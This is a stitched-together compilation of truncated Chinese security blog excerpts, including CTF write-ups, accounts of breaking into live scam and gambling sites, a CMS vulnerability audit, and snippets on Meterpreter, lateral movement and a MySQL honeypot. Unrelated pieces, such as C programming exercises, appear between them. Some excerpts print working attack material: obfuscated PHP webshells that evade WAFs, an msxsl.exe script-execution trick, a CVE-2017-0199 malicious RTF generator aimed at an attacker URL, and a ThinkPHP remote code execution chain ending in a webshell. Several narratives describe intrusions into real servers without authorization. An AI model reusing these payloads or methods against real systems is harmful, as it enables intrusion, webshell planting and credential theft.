红队攻击面相关讨论

初赛web_ezcmsswagger泄露test/test测试账号登录，/sys/user/**没有做鉴权，可以添加一个超级管理员用户， 此时仍然不知道roleId。并且role模块没有未授权。继续阅读user模块，发现接口 这里存在roleid泄露，这里填入前面泄露的admin的id fcf34b56-a7a2-4719-9236-867495e74c31 GET /sys/user/roles/fcf34b56-a7a2-4719-9236-867495e74c31此时知道了超级管理员id为 11b3b80c-4a0b-4a92-96ea-fdd4f7a4a7e9，添加用户 { "createWhere":0, "deptId":"1", "email":"", "password":"123456", "phone":"11111111111", "roleIds":[ "11b3b80c-4a0b-4a92-96ea-fdd4f7a4a7e9" ], "sex":"fmale", "username":"hacker" }password字段解码失败，然后用test账户查看日志发现了aes的key：AbCdEfGhIjKlMnOp，然后添加用户成功，我们添加用户之后，在模块发现了ping功能，但是有waf，绕过waf执行命令，得到flag POST /sys/ping HTTP/1.1 Host: User-Agent:Mozilla/5.0(Macintosh;IntelMac OS X 10.15; rv:126.…

前言在一个风和日丽的下午，我们正在Blank的带领下，兴致勃勃地讨论着，女人。 而float先生发现了一个访问了他博客的奇怪IP。 哎，根本不把什么网络安全法放在眼里，直接就开打。 Game Start浏览器访问会直接跳登陆界面。 信息收集路径上敲个X。拿到ThinkPHP和版本号。 同时，float先生nmap扫到801端口，并确定是宝塔建站。不过这里没有进一步研究。 RCE尝试5.0.21能直接RCE，且payload满天飞。不过依然遇到了一点小坑。 模块名不是通常的index，而且必须存在。根据跳转登录的uri： /admin/login/index.html 猜测module为admin，果然成功。 disable_functions赫然在列，则rce果然不成功。 种马好消息是写文件成功了。 访问shell.php，看到phpinfo界面。 反手就写冰蝎马连它。 趁机瞅了瞅，贷款、经理、业务员、bc...好，继续打。 连接数据库硬编码还真是宇宙难题，数据库密码到手。 第一次遇到MySQL的密码里有@，直接写会破坏连接串。如： mysql://root:[email protected]:3306/mysql password中的@会提前走到ip:端口的判断。需要把它编码为%40 管理员登录翻web目录和代码实在没有进展了，尝试登录一下系统。 数据库里有账号口令，当然口令是加盐的哈希。 谁家好人头铁非要暴密码出来，直接patch下login代码，不查表就完事了。 登录系统。 这业…

一、目录结构 首先我们先看一下结构，system文件夹下有相关代码。我直接给大家看一下漏洞吧。 二、审计出洞1、购物车异步获取信息 - SQL注入 system\modules\member\cart.action.php 虽然本身是过滤单引号但是在这里并没有用单引号保护起来所以这里是一个注入，并且没有验证用户身份，从站外未登陆的情况下即可进行注入。 直接官网哈哈哈哈！！！！ 2、BOM插件 - 目录遍历 system/plugin/bom/bom.plugin.php 直接访问即可，后台即便是改了也没什么事情，照样刚！ 3、我的晒单 - 存储型XSS（可打到管理员Cookie） 由于这套CMS出来的较早了，在此之前被许多小黑挖掘过XSS漏洞，但是....我这个XSS貌似也是0day 哈哈哈需要晒单功能这里给大家演示一下先走一遍流程 添加晒图 把图片地址改成我们的XSS语句 fileurl_tmp参数 这时候便把IMG标签闭合了弹出了1 （触发在后台管理的“晒单查看”） 4、上传配置 - 后台Getshell 可能有些人看到后台有上传的地方，其实这些个上传是没有办法利用的。虽然你可以在后台改格式白名单但是依旧提不下。这时候呢....插马呗！！~~ 由于他过滤单引号所以这里就不带上单引号了。 允许上传类型处，写上pyload 提交完就完事了~~ 通过copy函数远程写个马就完事了 5、后台验证码存在缺陷 默认账户admin 这一串MD5值就是对应的验证码的值，此…

0x00 漏洞背景 2020年10月14日，某监测发现 Microsoft 发布了 TCP/IP远程代码执行漏洞的风险通告，该漏洞是由于Windows TCP/IP堆栈在处理IMCPv6 Router Advertisement（路由通告）数据包时存在漏洞，远程攻击者通过构造特制的ICMPv6 Router Advertisement（路由通告）数据包 ，并将其发送到远程Windows主机上，可造成远程BSOD，漏洞编号为CVE-2020-16898。 0x01 影响版本 操作系统版本版本补丁经过测试 Windows 10 X86 / x64 / ARM64 1709 ✔️ Windows 10 X86 / x64 / ARM64 1803 ✔️ Windows 10 X86 / x64 / ARM64 1809年 ✔️ Windows 10 X86 / x64 / ARM64 1903年 ✔️ Windows 10 X86 / x64 / ARM64 1909年 ✔️ Windows 10 X86 / x64 / ARM64 2004年 ✔️ Windows Server 2019 Windows Server 2019（服务器核心版） Windows Server 1903版（服务器核心版） Windows Server版本1909（服务器核心版） Windows Server 2004版（服务器核心版本） …

信息搜集 开源情报信息收集（OSINT） github Github_Nuggests（自动爬取Github上文件敏感信息泄露） :https://github.com/az0ne/Github_Nuggests GSIL（能够实现近实时（15分钟内）的发现Github上泄露的信息） :https://github.com/FeeiCN/GSIL x-patrol(小米团队的):https://github.com/MiSecurity/x-patrol whois查询/注册人反查/邮箱反查/相关资产 站长之家:http://whois.chinaz.com/?DomainName=target.com&ws= 爱站:https://whois.aizhan.com/target.com/ 微步在线:https://x.threatbook.cn/ IP反查:https://dns.aizhan.com/ 天眼查:https://www.tianyancha.com/ 虎妈查:http://www.whomx.com/ 历史漏洞查询 : 在线查询:http://wy.zone.ci/ 自搭建:https://github.com/hanc00l/wooyun_publi/ google hacking 创建企业密码字典 字典列表 passwordlist:https://github.com/lavalamp-/password-lists 猪猪侠字典:https://pan.baidu.com/s/1dF…

###命令执行定义 直接调用操作系统命令： 当应用需要调用一些外部程序去处理内容的情况下，就会用到一些执行系统命令的函数。如PHP中的system，exec，shell_exec等，当用户可以控制命令执行函数中的参数时，将可注入恶意系统命令到正常命令中，造成命令执行攻击。 命令执行是指攻击者通过浏览器或者其他客户端软件提交一些cmd命令（或者bash命令）至服务器程序，服务器程序通过system、eval、exec等函数直接或者间接地调用cmd.exe执行攻击者提交的命令。 系统命令执行是指应用程序对传入命令行的参数过滤不严格导致恶意用户能控制最终执行的命令。应用有时需要调用一些执行系统命令的函数，如PHP中的system、exec、shell_exec、passthru、popen、proc_popen等，当用户能控制这些函数中的参数时，就可以将恶意系统命令拼接到正常命令中，从而造成命令执行攻击，这就是命令执行漏洞。 ###命令执行与代码执行的判断与区别 参考OWASP的 代码注入和命令注入，其中的相关解释:可以用下面一句话判断是代码执行还是命令执行：执行效果是否受制于语言本身与其安全机制。 代码执行漏洞指的是可以执行PHP脚本代码，而命令执行漏洞指的是可以执行系统命令或应用指令（如cmd命令或bash命令）的漏洞。代码执行漏洞是调用系统命令的漏洞，命令执行漏洞是直接调用系统命令，又称为os命令执行漏洞。 这里先给大家看一下两种漏洞的区别，命令执行长这样： 代码执行长这样： 1.代码执行 1. 执行的…

总则 首先这里的内网不包含网络拓扑规划、应用发布、访问控制的等基础网络规划的内容，对于身份鉴别模式和访问控制有推荐的场景模式。对于内网安全的管控还是回归风险评估三要素，从扫要素开始说起，更能体现管控工作的思路。 风险评估三要素： - 资产：这里包含所有的IT资产和无形资产（包含数据和名誉）； - 威胁：这里一般指的是面临的内部和外部可能的有害行为和力量； - 脆弱：这里多指漏洞以及存在的其他隐患； 资产 换了个角度来分析就看出来为什么内网安全第一步要做资产的收集整理归类，其实这一步恰恰也是最繁杂的。一般公司不会再初创伊始就注重安全，肯定是发展到了一定阶段才开始关注安全并建立自己的安全部门，除了紧急救火外，第一步要做的推进事项就是收集资产、分类资产、管控资产；特别要注明的是对不同的资产要执行不同的安全策略。类似OA、财务、域控等重要系统，它们或许有敏感数据，或许有内网权限集合，所以要格外特别保护，执行最严格的管理措施，但是对于测试虚拟化主机池，在做好隔离的情况下，不一定要执行一类的安全标准。 执行资产发现的技术方案： - 收集最原始的数据包括（IP、域名、URL等）； - 收集业务相关信息（资产归属和运维负责人、资产使用目的等）； - 使用以上数据对内网进行探测发现（masscan、nmap）发现活跃的Domain、IP、URL等，对于域名还要进行多种解析，求得子域名、A记录、CNAME等（DNS、PDNS）； - 所有等级资产入库，对于所有IP进行端口扫描…

内网终端安全工作思考 内网办公主机 办公主机的安全需求 这里列举一般办公主机的需求项： 病毒防御（本地查杀选用国外厂商的产品，能接受云查杀选用国内厂商的产品，没有重要机密的内容的）； 入侵检测防御（说白了就是HIDS或者HIPS产品，一般国内都是和杀毒软件集成的）； 漏洞防护（打补丁，一般国内也是集成在杀软里面的）； 软件管控（软件中心功能，一般对win平台比较常见）； 日志记录； 管控场景（禁止起SSID等、数据防泄漏DLP） 这里用来解释一下日志需求： 日志记录一般可以做两件事情被攻击的响应追查和主动攻击的追踪溯源； 日志可以记录邮件、进程、服务、命令等等； 办公主机安装和在线率提高方案 全员检查 内网做准入 虚拟桌面后台强制安装 工作三部曲 推全员安装 做准入推全员再现 推漏洞补丁自动安装并接受实时日志 重点管控对象 人力资源部门 法务财务部门 高管要职群体 助理秘书群体 投资融资部门 其他关键人员 重点效果预期 自主防御能力提升化 漏洞补丁修复自动化 敏感数据传存安全化 病毒爆发场景预知化 攻击失陷发现简单化 内外服务器端 服务器的安全需求 这里列举一般服务器的需求项： Windows服务器 补丁安装与漏洞组件监控升级（服务器不建议自动升级或打补丁，因为需要重启，而且打补丁情况不可控） 自主防御能力（HIPS或HIDS能力，也可以在网络层做NIPS） 可信软件中心（软件管控） 日志监控 UnixLike服务器 漏洞监控与修补（监控下手动升级，建议用漏扫引擎结合POC做） 自主防御模块（…

前言： 郑轻OJ题解acm.zzuli.edu.cn 安装和配置C语言 Dev c++安装环境配置【配置较简单】另一个学习C语言编译工具 2年前0168176 VScode安装配置环境-全网原创最详细教程【学习C语言第一步!】 2年前0140160 建议二者都安装（先安装Dev c++因为配置较简单） 1000: 从今天开始入坑C语言 #include <stdio.h> int main() { printf("从今天开始入坑C语言"); return 0; } 1001:整数a+b #include<stdio.h&…

前言 Web89 intval取整数 就跟python中的int一样 这里是只要有0-9就输出nonono 但是还需要是传出去是整数 所以我们用数组绕过 Web90 intval($var,$base)，其中var必填，base可选，这里base=0,则表示根据var开始的数字决定使用的进制： 0x或0X开头使用十六进制，0开头使用八进制，否则使用十进制。 这里是0开头 说明是根据开始的数字决定使用的进制 这里用的是八进制十六进制绕过 加0是告诉服务器这是八进制 如果转换成十六进制需要加0x Web91 不想打字了,感觉WP里给的说的好全面 i忽略大小写 m多行模式 我们只要让我们的参数里含有php即可 payload:cmd?=111%0aphp 或者cmd?=php%0aggg Web92 这里与web90的不同之处就在于等号了 ===表示类型和数值必须相等 ==是值相等就可以类型不一定相等 我们知道强制转换如果是小数部分的话会舍弃小数部分直接构造小数 Web93 不解释直接秒 Web94 查一下strpos用法 这里说明我们得含有0 但不能在开头,因为开头告诉服务器使用几进制 Web95 过滤了.八进制起手 +或者空格绕过最后一个限制 W…

漏洞信息: 2017年5月24日Samba发布了4.6.4版本，中间修复了一个严重的远程代码执行漏洞，漏洞编号CVE-2017-7494，漏洞影响了Samba 3.5.0 之后到4.6.4/4.5.10/4.4.14中间的所有版本。 漏洞利用条件: 1. 服务器打开了文件/打印机共享端口445，让其能够在公网上访问 2. 共享文件拥有写入权限 3. 恶意攻击者需猜解Samba服务端共享目录的物理路径 满足以上条件时，由于Samba能够为选定的目录创建网络共享，当恶意的客户端连接上一个可写的共享目录时，通过上传恶意的链接库文件，使服务端程序加载并执行它，从而实现远程代码执行。根据服务器的情况，攻击者还有可能以root身份执 测试环境： 在docker下搭建测试环境 1.拉取镜像到本地 root@backlion-virtual-machine:/home/backlion# docker pull medicean/vulapps:s_samba_1 2.启动环境，并将虚拟的445端口映射到物理机的445端口上： root@backlion-virtual-machine:/home/backlion# docker run -d -p 445:445 -p 139:139 -p 138:138 -p 137:137 medicean/vulapps:s_samba_1 3.在msf下的利用（kali主机IP: 10.0.0.140，靶机下的ubuntu的物理住机IP:10.0.0.158) 利用的poc: ht…

今天朋友突然告诉我，某转买手机被骗了1200块钱，心理一惊，果然不出所料，那我来试试吧。 要来了诈骗网站地址，打开是这种： 果断收集一下信息：（由于留言骗子返还朋友钱款，暂时给他留点面子，打点马赛克） 查看端口，一猜就是宝塔面板搭建开着80，那就访问一下：从官网查找客服软件的教程。发现后台路径为：/admin直接访问果然发现：想也没想，直接admin：123456，没想到的是进去了哈哈哈：下一步当然是getshell，找了一圈发现直接可编辑语言配置文件：这里使用简单的一句话还给我封了ip丫的，看了一眼竟然用云盾，这骗子还有点安全意识，那只好祭出我的哥斯拉杀器（直接带bypass function的，也好用对不）：好家伙，禁用的函数如此之多，那行吧，绕过呗文件管理时发现限制目录读取： 直接使用哥斯拉的目录访问绕过： 最后目录浏览时发现php存在多个版本，本人php5提权不太熟悉(哥斯拉不适用哈哈)，看见php7后果断找其他站点：访问其他站点都能访问，解析ip都是这个，终于发现一个php7的 终于发现一个php7的，但是linux版本内核很新啊，看来提权是个麻烦 而后不出所料，哥斯拉的函数绕过可执行命令：执行后直接获取低权限shell： 是www用户，权限很低。 在目录下还发现了一个杀猪盘工具：框框 可以一键生成诈骗详情链接： （现在大家知道不要相信qq微信交易的重要性了吧，这种杀猪盘很容易坑人） 最后根据收集到的数据库链接等信息准备进数据库里看一眼，哥斯拉的链接有问题： 于是搭建frp到骗子服务器访问： 信息： 由…

某天挖 edu 挖到自闭，然后想着 fofa 一下，看看有没有什么好玩的站点 好家伙，居然还真有这种商城，原谅我孤陋寡闻了。于是乎，想进去学习了一下 首先，进行了一下初步的信息收集 基本上都是伪静态的，没有什么发现可以明显判断其网站后端语言的地方在搜索框点击搜索后 可以发现这个地址并不能帮助我们判断该站的类型但也要尝试一下SQL注入 然后直接被 Ban IP了，索性放弃对这个地方的继续研究，继续翻找其他功能点。当我们点击订单查询时 可以发现Url 产生了变化 跳转到了登录注册页面，既然来都来了，注册一个看看有没有其他业务，黑不走空，哈哈哈 昵称处尝试打 Xss，发现也会被 Ban IP，那就先放一下，找找有没有什么业务逻辑漏洞吧。尝试购买一些商品，之前一直听说支付漏洞，但弟弟从没有真正遇到过，碰碰运气吧 点击购买，抓包发现 cookie 中出现了一个奇怪的参数 我们拿去urldecode 一下，看看是什么东西 那就猜测一下，可以看到前面应该是价格，后面是购买的个数，我们先改一下 编码回去，覆盖发包 因为在 cookie 里，所以传过去的每个数据中的 cookie 都要改 可以发现，我们的单价变为了 1，数量为 10，总额变为了 10，记录一下参数之间对应的关系 提交订单，修改cookie内的值，然后继续，页面跳转到了支付宝付款页面 点开支付宝，发现价格的确发生改变 没错，75元的商品，只需要17元即可支付，但是商家发不发货就不晓得了 意外惊喜 然后，我…

1.需要用到微软工具MSXSL.exe，msxsl.exe是微软用于命令行下处理XSL的一个程序，所以通过他，我们可以执行JavaScript进而执行系统命令，其下载地址为： https://www.microsoft.com/en-us/download/confirmation.aspx?id=21714 2.执行该工具需要用到2个文件，分别为XML及XSL文件，其命令如下： msxsl.exe test.xml exec.xsl test.xml: <?xml version="1.0"?> <?xml-stylesheet type="text/xsl" href="exec.xsl" ?> <customers> <customer> <name>Microsoft</name> </customer> </customers> 　 exec.xsl <?xml version='1.0'?> <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:user="http://mycompany.com/mynamespace"> <msxsl:script…

0x00 前言红蓝对抗无疑是一场持续性的博弈过程，随着近几年的攻防不断，打了一轮又一轮，web漏洞的急剧减少，社工钓鱼显然成为了主流的攻击手段之一。 0x01 免责声明请您务必认真阅读、充分理解下列条款内容： 1、本公众号分享的任何文章仅面向合法授权的企业安全建设行为与个人学习行为，严禁任何组织或个人用于非法活动。 2、在使用本文相关工具及技术进行测试时，您应确保该行为符合当地的法律法规，并且已经取得了足够的授权。 3、如果您在使用本文相关工具及技术的过程中存在任何非法行为，您需自行承担相应后果，我们将不承担任何法律及连带责任。 4、严禁任何组织或个人使用本公众号的名义进行非法盈利。 5、本公众号的所有分享工具及技术文章，严禁不经过授权的公开分享。 如果发现上述禁止行为，我们将保留追究您法律责任的权利，并由您自身承担由禁止行为造成的任何后果。 0x02 常规操作走一遍拿到靶标后 --> 资产收集 --> 找软柿子 --> 尝试打点 拿到靶标单位信息后，通过企查查查域名和企业架构，发现没有对外投资，只有一个上级单位总公司 找子域，也没啥可用资产（virustotal.com，快速简便但不准确） 通过qaxnb资产绘测平台来看看是否有可用信息，也是空空如也 通过多点Ping，域名解析等操作来找真实IP，发现都是指向阿里云 一套流程下来，除了一个打不动的官网（域名解析指向云，更没心情去深入挖掘了），没有任何可以打点的目标了 最终得出结论：软柿子竟是我自己 0x03 条条大路通罗马web打不动，就不能走常…

0x01 前言 MERCY是一个致力于PWK课程安全的靶机系统。MERCY是一款游戏名称，与易受攻击的靶机名称无关。本次实验是攻击目标靶机获取root权限并读系统目录中的proof.txt信息 靶机的下载地址： https://drive.google.com/uc?id=1YzsW1lCKjo_WEr6Pk511DXQBFyMMR14y&export=download（注意确认下载镜像中MERCY.mf的sha256值是否正确） 0x02 信息收集 1.存活主机扫描 root@kali2018:~#arp-scan -l 发现192.168.1.12就是目标靶机系统 2.端口扫描 通过NAMP对目标靶机进行端口扫描 root@kali2018:~# nmap -A192.168.1.12 Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-12 09:55 EST Nmap scan report for 192.168.1.12 Host is up (0.00091s latency). Not shown: 990 closed ports PORT STATESERVICE VERSION 22/tcp filtered ssh 53/tcp opendomain ISC BIND 9.9.5-3ubuntu0.17 (Ubuntu Linux) | dns-nsid: |_ bind.v…

因为这个站是几个月前日的了，所以图片可能不全，也没办法再补图。 写这篇文章的时候，隔壁情侣正在鼓掌，声音贼响，导致我写的东西可能没有过一遍脑子，写的可能有点混乱。另外值得一提的是，为啥我们做安全的经常隔壁碰到这种人？ 已知目标网站 之前客户有给过这种网站，所以我记忆尤深，针对这种站一般你可以直接放弃正常测试流程了，因为经验告诉我，网站主站功能基本上很少有漏洞的，只能从旁站下手。 Ctrl+u查看一波没发现有什么存在泄漏的js，回过头发现发现网站右上角有个优惠活动大厅 打开后页面似曾相识 随便点开一个活动，好像可以随便提交文字，没有过滤，我信心满满输入xss，提交，然而两天过去了，并没什么叼用，我当时的心情真是像云像雾又像雨。 然而我又发现下面有个审核进度查询，打开后会让你输入用户名，既然有输入用户名，那应该就是有带入数据库查询，习惯性加了个’点击查询，10秒过去了，没响应，我懵了，输入正常不存在的账号测试，是会弹出记录的，但是加单引号查询却一点响应都没有。 F12-network抓包，发现是有发送请求的，很明显了，有注入，而且报错是页面是thinkphp，从最下角看版本是3.2.3，这个版本真的是hc的最爱，从色情到贷款平台，再到菠菜都是这个版本的thinkphp。 先注入一波试试 抓包Sqlmap一波拿到了管理员账号密码，突然我意识到，我没有后台地址，拿到了也没叼用。 Fofa一波得到真实ip，发现999端口存在phpmyadmin服务，6588有一个标题为护卫神丶主机大师的asp站。目录爆破，端口扫描，子域名挖掘，都没有找…

0×01 姿势一 我们知道PHP动态函数很有意思，那么你猜到了，姿势一就是： <?php$_POST['xx']($_POST['oo']);?> 注意XX参数设置成EVAL是不行的哦，让我们来看看效果： 0×02 姿势二 关键词是过滤了，但是你老是交一些奇奇怪怪的东西，人家几万块买的WAF也不是吃白饭的啊。好好好你丑你说什么都是对的，我们不交了，getallheaders函数能够获取请求头内容，来试试新家伙： <?phpeval(getallheaders()['Accept-Language']);> 当然你要是猥琐到这样，那恭喜你，你已经学会举一反三了... <?php$a=getallheaders()['xxx'];$a(getallheaders()['ooo']);> 0×03 姿势三 遇到一般的waf可能上个姿势就能绕过，但是还是会有一些臭不要脸的waf会检测http请求头里的内容，咱们还是从技术角度出发来看看这个问题怎么绕过，猥琐的人可能首先想到了的base64，更猥琐的人可能想到了各种自写函数进行编码，替换，但是我见过最猥琐的思路是gzuncompress和gzcompress函数，话不多说我们先放壳： <?phpeval(gzuncompress(base64_decode(getallheaders()['xx'])));> http头部的里面的xx字段看起来像base64编码（其实实他就是base64编…

关于Mysql蜜罐的具体技术细节，网上文章介绍的太多了，大家可以自己从网上搜索文章，我写一个简介吧：mysql中有一个load data local infile函数能够读取本地文件到mysql数据库中。当攻击者用爆破mysql密码的扫描器扫描到我们的mysql并连接上的时候（注，这里我纠正一下，只要连接一下蜜罐mysql，就可以被蜜罐读取到本地配置文件，不需要提供正确的用户名密码），客户端（攻击者）会自动发起一个查询，我们（服务端）会给与一个回应，我们在回应的数据包中加入load data local infile读取攻击者的本地文件到我们数据库中，达到反制的目的。（以下图片来源于网络搜索） cs的配置文件明文存储密码只要是使用cs客户端连接过cs服务端的电脑，cs客户端都会在固定的文件夹下生成一个.aggressor.prop配置文件。如果是Windows系统，那么文件位置是：C:\Users\Administrator\.aggressor.prop，这个配置文件里面就包含了cs远控的ip地址、端口、用户名及密码，而且都是明文的！如下图所示： 每次打开cs都会显示出曾经登录后的ip地址、端口、用户名、密码等信息，这些信息都是存储在本地.aggressor.prop文件中的，大致内容如下图所示： 因此我们得到结论，搭建一个mysql蜜罐，一旦攻击者连接这个蜜罐，那么这个蜜罐利用msyql本地文件读取漏洞去自动读取C:\Users\Administrator\.aggressor.prop这个文件内容，蜜罐就可以成功得到攻…

Using Meterpeter commands Since the Meterpreter provides a whole new environment, we will cover some of the basic Meterpreter commands to get you started and help familiarize you with this most powerful tool. Throughout this course, almost every available Meterpreter command is covered. For those that aren’t covered, experimentation is the key to successful learning. help The ‘help‘ command, as may be expected, displays the Meterpreter help menu. meterpreter > help Core Commands ============= Command Description ------- ----------- ? Help menu background Backgrounds the current session channel Displays informatio…

一、flag的提交格式flag{th1s_!s_a_d4m0_4la9}二、PDF隐写writeup:使用在线word转pdf工具，转成word文件，然后拖动就可以查看到flaghttps://app.xunjiepdf.com/pdf2word/ 三、GIF图片隐写一writeup: 1.使用Stegsolve工具的Frame Browser浏览器查看静态的图片 File Format: 文件格式，这个主要是查看图片的具体信息 Data Extract: 数据抽取，图片中隐藏数据的抽取 Frame Browser: 帧浏览器，主要是对GIF之类的动图进行分解，动图变成一张张图片，便于查看 Image Combiner: 拼图，图片拼接 2.二维码缺少三个小方块，而这些小方块被称为定位图案，用于标记二维码矩形的大小，用三个定位图案可以标识并确定一个二维码矩形的位置和方向。3.将静态图片截图保存下，使用phoshtop工具修复二维码图片，然后进行扫描 https://jiema.wwei.cn/（二维码在线识别工具） 四、jar隐写writeup: 1.用 jd-gui 打开，直接搜索：flag 2.通过base64解密得到flag{DajiDali_JinwanChiji}五、压缩包隐写之黑白图片writeup:1.用winhex查看这些图片，没有发现可利用信息，于是想到黑白可能代表二进制0和1。我们将白色视为0黑色视为1或者反过来尝试一遍。一共有104张图片正好是8的倍数，可以转为8个一对二进制，再转化为ASCII码。由于图片较多，我们…

0x00 前言 针对于内网渗透个人理解为信息收集（内部网段的扫描、端口服务、操作系统、补丁更新、域机器及重要业务机器定位、杀毒软件、防火墙策略、密码的规则、内部敏感文档等）然后根据获取到的信息来绘画出内部的网络结构和内网脆弱点从而进行横向渗透。 本篇文章记载了当拿到内网机器的密码或Hash进行横向移动的方式。 0x01 环境介绍 1.1 扩展图 1.2 网络环境 Windows 7 跳版机（192.168.200.222、10.211.66.5）双网卡可出网也可与内网连通。 Windows server 2012 目标靶机（192.168.200.66）不可出网。 1.3 简述 攻击者通过渗透测试拿到主机Win 7(192.168.200.222)的权限并发现可出网，所以上线CS用来权限维持。 前提我们已经抓取到Win 7(192.168.200.222)跳板机的登陆明文凭证，这里是我添加的明文凭证，窃取凭证的方法有很多这里不在赘述参考文章，此篇文章只记录个人在学习内网环境下横向移动的一些笔记。 添加一个 Win 7(192.168.200.222)跳板机的监听器用来做中转会话。 生成木马文件在本地。 Tips：因为Win 2012(192.168.200.66)目标机不出外网所以选择刚添加的中转会话。 0x02 IPC$ && 计划任务 2.1 利用条件 1）没有禁用IPC$连接、139和445端口、未使用防火墙等方式来阻止IPC$。 2）目标机器开启了相…

Microsoft Word下的恶意RTF文件容易被收到攻击，在本文中，我们使用python脚本对Microsoft Word 2013进行oday攻击演示，该脚本会生成恶意的.rtf文件，并提供目标系统的篡改会话。 利用工具包CVE-2017-0199 - v2.0是一个很有用的python利用脚本，它提供了一种快速有效的利用Microsoft RTF RCE进行攻击的方式。它可以生成恶意的RTF文件，并将metasploit 下meterpreter反弹shell有效载荷提供给攻击者，而不需要任何复杂的配置。 测试环境： 攻击者：Kali Linux（ip:192.168.1.24） 目标：Windows 10（ Microsoft Word 2013 ） 1.打开您的kali Linux的shell终端，然后输入以下命令生成一个恶意rtf： git clone https://github.com/bhdresh/CVE-2017-0199.git 此命令将运行一个python脚本来生成富文本格式的有效载荷，其中-M用于生成rtf文件,-w用于生成rtf文件的名称，即sales.rtf， -u为攻击者的IP地址或域名。 cd CVE-2017-0199 python cve-2017-0199_toolkit.py -M gen -w sales.rtf -u http://192.168.1.24/raj.doc 以下截图中的命令输出生成的恶意.rtf文件即sales.rtf文件可以在系统中找到。…

一、 起因近年来国内发生各种非法菠菜赌博案例非常之多，本次我就来讲解一下我是如何渗透下一个非法菠菜的网站的。本次渗透纯粹是运气+站长疏忽，可谓是千年堤坝毁于蚂巢之说。为了保证读者的理解，特采用入侵者的身份来纪实！ 二、踩点及收集信息打开目标站，发现是一个菠菜网站，然后开始收集信息了 域名的whois信息查询得知域名来自西部数码 这里我使用站长之家的ping工具是为了看有没有使用CDN及查询服务器机房位置。从whois结果得知使用的是dnspod的dns，但是有过经历的都是知道，一般的大型的IDC厂商，都是有自己的dns，代理才会使用dnspod 很明显，这个域名在代理上注册的，本来准备社工域名，但是没什么意义，别人解析回来了还是一样的使用，之前F4ther写过一篇文章是说做了个蜜罐钓鱼劫持了安全脉搏。但是太麻烦，还是直接略过，直接渗透吧。 我看到URL后面是Home/Change/AlipayInfo/alipay/微信.html，我第一预感就是使用ThinkPHP框架来写的程序。 为了验证我的猜想，我特地随便输入地址看他报错，一般的ThinkPHP报错都会显示出版本+物理路，其结果，有图上踩点可以得到以下信息 1. 此站使用的是ThinkPHP3.2.2的框架。 2. 物理路劲C:\WWW\pcdd\pc 3. 此网站没有使用CDN 4. 此网站服务器在境外（加拿大）。 5. 此网站必有漏洞。 三、 开始战斗随便找了一处直接sqlmap测试，结果如下图，有防护，直接被墙，导致无法继续，连接一个VPN 再看看，不行想办…

前言 直接放视频地址建议b站观看 https://tryhackme.com/r/room/expose sql注入+文件包含+文件上传+提权